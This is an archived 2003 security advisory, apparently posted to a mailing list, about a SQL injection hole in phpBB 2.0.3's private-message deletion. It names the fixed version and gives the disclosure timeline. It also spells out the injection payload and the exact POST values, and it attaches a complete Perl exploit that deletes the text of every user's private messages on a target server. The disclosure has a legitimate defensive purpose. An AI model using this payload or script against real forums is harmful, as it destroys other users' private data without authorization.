PDA

Bekijk Volledige Versie : phpBB SQL Injection vulnerability



Ulf Harnhammar
20/01/03, 06:21
--nFreZHaLTZJo0R7j
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

phpBB SQL Injection vulnerability


PROGRAM: phpBB
VENDOR: phpBB Group
HOMEPAGE: http://www.phpbb.com/
VULNERABLE VERSIONS: 2.0.3, possibly others
IMMUNE VERSIONS: 2.0.4
LOGIN REQUIRED: yes


DESCRIPTION:

"phpBB is a UBB-style dissussion board written in PHP backended by a
MySQL database. It includes features such as posting/replying/editing
messages, private messages, private forums, user and anonymous
posting, robust theming, user ranking by posts or by special,
admin definable, ranks, and much more."

(direct quote from the program's project page at Freshmeat)

phpBB is published under the terms of the GNU General Public License.
It is a very popular program with lots of installations.


SUMMARY:

phpBB users can send private messages to each other. The program has
got a security hole, making it possible for a user to delete the text
of all private messages stored in the system.


TECHNICAL DETAILS:

The function for deleting private messages has got an SQL Injection
hole. If we submit data saying that we want to delete private
message number "1) OR 1=1 #", the text of all private messages for
all users on the system will be deleted.

The messages are stored in two tables, and the SQL Injection will
only work on one of them, so all the text bodies are deleted but the
subjects and metadata are only deleted if they belong to the current
user. This means that the subjects of the deleted messages will still
show up in the other users' folders. When a user clicks on a deleted
message, he or she will just be redirected back to the folder.

You can exploit this by POSTing the following values to
privmsg.php?folder=inbox&sid=[THE SID VALUE]:

mode=""
delete="true"
mark[]="1) OR 1=1 #"
confirm="Yes"

The current SID value is shown in the URL field, if you log in to
the system with cookies turned off.


COMMUNICATION WITH VENDOR:

The vendor was contacted on the 14th of January. Version 2.0.4 was
released on the 16th of January.


EXPLOIT:

I have attached a Perl exploit for this issue. It deletes the text
of all private messages. Before starting it, you have to log in
and get the SID value as described above.


// Ulf Harnhammar
VSU Security
ulfh@update.uu.se


--nFreZHaLTZJo0R7j
Content-Type: application/x-perl
Content-Disposition: attachment; filename="phpbb-exploit.pl"
Content-Transfer-Encoding: quoted-printable

#!/usr/bin/perl --=0A=0A# phpBB delete the text of all users' private messa=
ges exploit=0A# Ulf Harnhammar=0A# January 2003=0A=0Ause Socket;=0A=0Aif (@=
ARGV !=3D 2) { die "usage: $0 host sid\n"; }=0A=0A($host, $sid) =3D @ARGV;=
=0A$host =3D~ s|\s+||g;=0A$sid =3D~ s|\s+||g;=0A=0A$crlf =3D "\015\012";=0A=
$http =3D "POST /privmsg.php?folder=3Dinbox&sid=3D$sid HTTP/1.0$crlf".=0A =
"Host: $host$crlf".=0A "User-Agent: Mozzarella/1.37++$crlf".=
=0A "Referer: http://www.phpbb.com/$crlf".=0A "Connection: cl=
ose$crlf".=0A "Content-Type: application/x-www-form-urlencoded$crlf"=
..=0A "Content-Length: 58$crlf$crlf".=0A "mode=3D&delete=3Dtru=
e&mark%5B%5D=3D1%29+OR+1%3D1+%23&confirm=3DYes";=0A=0A$tcp =3D getprotobyna=
me('tcp') or die "Couldn't getprotobyname!\n";=0A$hosti =3D inet_aton($host=
) or die "Couldn't look up host!\n";=0A$hosts =3D sockaddr_in(80, $hosti);=
=0A=0Asocket(SOK, PF_INET, SOCK_STREAM, $tcp) or die "Couldn't socket!\n";=
=0Aconnect(SOK, $hosts) or die "Couldn't connect to port!\n";=0A=0Aselect S=
OK; $| =3D 1; select STDOUT;=0A=0Aprint SOK $http;=0A=0A$junk =3D '';=0Awhi=
le (<SOK>) { $junk .=3D $_; }=0A=0Aclose SOK or die "Couldn't close!\n";=0A
--nFreZHaLTZJo0R7j--